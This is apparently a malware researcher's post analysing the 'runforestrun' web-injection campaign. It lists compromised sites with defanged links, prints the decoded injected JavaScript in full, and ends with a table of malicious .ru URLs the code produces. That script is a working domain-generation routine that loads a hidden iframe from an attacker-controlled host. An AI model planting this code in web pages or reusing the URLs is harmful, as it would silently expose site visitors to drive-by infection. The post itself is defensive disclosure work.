We released the details in our pastebin here: --->>[PASTEBIN], and will summarize the details as per follows:
NEW infectors is popping up since Oct26th as per below urls:h00p://fig.is/2010/12/ny-heimasi??a-felags-islenskra-gigtarl??kna/?kna/feed h00p://fig.is/2012/01/althjodlegt-thing-um-scleroderma/feed h00p://fig.is/2010/12/ny-heimasi??a-felags-islenskra-gigtarl??kna/feed h00p://fig.is/2010/12/ny-heimasi%C3%B0a-felags-islenskra-gigtarl%C3%A6kna/?kna/feed h00p://fig.is/2010/12/ny-heimasi?kna/feed h00p://www.imaginactionstunts.com/calendar/past h00p://www.imaginactionstunts.com/action-team/profil-mathieu-ledoux/feed/ h00p://www.imaginactionstunts.com/action-team/profil-sebastien-rouleau/feed h00p://www.imaginactionstunts.com/action-team/profil-mike-chute/feed h00p://www.imaginactionstunts.com/action-team/profil-thomas-liccioni h00p://www.imaginactionstunts.com/action-team/profil-jean-sebastien-cote/feed/ h00p://www.imaginactionstunts.com/action-team/profil-stephane-lefebvre/feed/ h00p://browsersphere.com/ h00p://suesat-recycle.com/plugins/system/rokbox/rokbox.js h00p://www.cityenvies.com/ h00p://icaihyd.org/js/stepcarousel.js h00p://isveren.net/organize_sanayi_bolgeleri h00p://www.anteaagency.cz/js/jquery.colorbox-min.js h00p://idealbench.com/js/bottom.jsThe decoded PseudoRandom is as per below hexed ones..function nextRandomNumber(){ var hi = this .seed / this .Q; var lo = this .seed % this .Q; var test = this .A * lo - this .R * hi; if (test > 0){ this .seed = test; } else { this .seed = test + this .M; } return (this .seed * this .oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix * 1000); var s = d.getHours() > 12 ? 1 : 0; this .seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math. round(s * 0xFFF)); this .A = 48271; this .M = 2147483647; this .Q = this .M / this .A; this .R = this .M % this .A; this .oneOverM = 1.0 / this .M; this .next = nextRandomNumber; return this ; } function createRandomNumber(r, Min, Max){ return Math.round((Max - Min) * r.next() + Min); } function generatePseudoRandomString(unix, length, zone){ var rand = new RandomNumberGenerator(unix); var letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o' , 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']; var str = ''; for (var i = 0; i < length; i ++ ){ str += letters[createRandomNumber(rand, 0, letters.length - 1)]; } return str + '.' + zone; } setTimeout(function (){ try { if (typeof iframeWasCreated == "undefined"){ iframeWasCreated = true; var unix = Math.round( + new Date() / 1000); var domainName = generatePseudoRandomString(unix, 16, 'ru'); ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src", "h00p://" + domainName + "/ď˝’unforestrun?sid=botnet2"); ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e){ } } , 500);All urls were extracted as per below snips, the complete - urls is as per pasted here:--->>[PASTEBIN]Sat Dec 31 19:00:01 EST 2011-http://yhzktxbspmeioevy.ru/runforestrun?sid=botnet2 Sun Jan 1 07:30:00 EST 2012-http://kxfcnwlyyohascji.ru/runforestrun?sid=botnet2 Sun Jan 1 19:59:59 EST 2012-http://ndvgpxdugiihprox.ru/runforestrun?sid=botnet2 Mon Jan 2 08:29:58 EST 2012-http://wjikjkybqouienfm.ru/runforestrun?sid=botnet2 Mon Jan 2 20:59:57 EST 2012-http://yowoyitslewxwwrl.ru/runforestrun?sid=botnet2 Tue Jan 3 09:29:56 EST 2012-http://jwkynwfxjqdqqmji.ru/runforestrun?sid=botnet2 Tue Jan 3 21:59:55 EST 2012-http://lcbfcpzjpyvoheuj.ru/runforestrun?sid=botnet2 Wed Jan 4 10:29:54 EST 2012-http://vjnhblgryauqcpmr.ru/runforestrun?sid=botnet2 Wed Jan 4 22:59:53 EST 2012-http://xocnrffrwjwryily.ru/runforestrun?sid=botnet2 Thu Jan 5 11:29:52 EST 2012-http://iwoughjskqxnoury.ru/runforestrun?sid=botnet2 Thu Jan 5 23:59:51 EST 2012-http://kcgbtgkouhxwzqce.ru/runforestrun?sid=botnet2 Fri Jan 6 12:29:50 EST 2012-http://tirdttcivfplnrds.ru/runforestrun?sid=botnet2 Sat Jan 7 00:59:49 EST 2012-http://gwtrhozqbvudulyl.ru/runforestrun?sid=botnet2 Sat Jan 7 13:29:48 EST 2012-http://jbkxeiekxelpidpi.ru/runforestrun?sid=botnet2 : (and so on...)The moral of this findings are: 1. This time Pseudorandom not extracted domains BUT full infected URLs. 2. The double or maybe tripple obfuscation found in recent Pseudorandom landing html.
#MalwareMustDie! (Special thanks to EO for great crack!!)
